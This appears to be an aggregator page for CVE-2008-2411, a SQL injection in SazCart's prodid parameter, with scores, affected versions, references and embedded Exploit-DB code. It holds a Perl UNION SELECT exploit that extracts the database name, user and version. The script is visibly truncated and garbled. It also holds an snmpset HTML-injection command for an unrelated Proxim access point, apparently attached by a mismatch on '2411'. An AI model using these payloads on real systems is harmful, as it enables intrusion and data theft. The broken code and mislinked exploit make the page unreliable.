CVE-2008-2411
Published 2008-05-22
CVE-2008-2411: SQL injection vulnerability in index.php in SazCart 1.5.1 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL…
Priority P336 · medium · 6.8 · CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.12% (62.2th percentile)
SQL injection vulnerability in index.php in SazCart 1.5.1 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the prodid parameter in a details action.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sazcart | sazcart | <= 1.5 | — |
| sazcart | sazcart | — | — |
| sazcart | sazcart | — | — |
No detection rules found.
Exploit-DB
Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection
exploitdb·2008-10-09
CVE-2008-5869 Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection
---
source: https://www.securityfocus.com/bid/31666/info
The Proxim Tsunami MP.11 2411 Wireless Access Point is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
Attacker-supplied HTML and script code would run in the context of the web interface of the affected device, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
This issue is reported in the Tsunami MP.11 Model 2411; additional products may also be vulnerable.
$ snmpset -v1 -c public 192.168.1.100 sysName.0 s'">alert(1)'
Exploit-DB
SazCart 1.5.1 - 'prodid' SQL Injection
exploitdb·2008-05-09
CVE-2008-2411 SazCart 1.5.1 - 'prodid' SQL Injection
---
#!/usr/bin/perl
# SazCart new() or die;
my $go=$cnx->get($victim."?details&prodid=1'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*");
if ($go->content =~ m/Price\:(.*?)\<br/ms)
{
print "[+] $1\n\n";
} else {
print "\n[-] exploit failed\n";
}
# milw0rm.com [2008-05-09]
No writeups or analysis indexed.
http://secunia.com/advisories/30148
http://securityreason.com/securityalert/3900
http://www.securityfocus.com/archive/1/491892/100/0/threaded
http://www.securityfocus.com/bid/29129
https://exchange.xforce.ibmcloud.com/vulnerabilities/42542
https://www.exploit-db.com/exploits/5576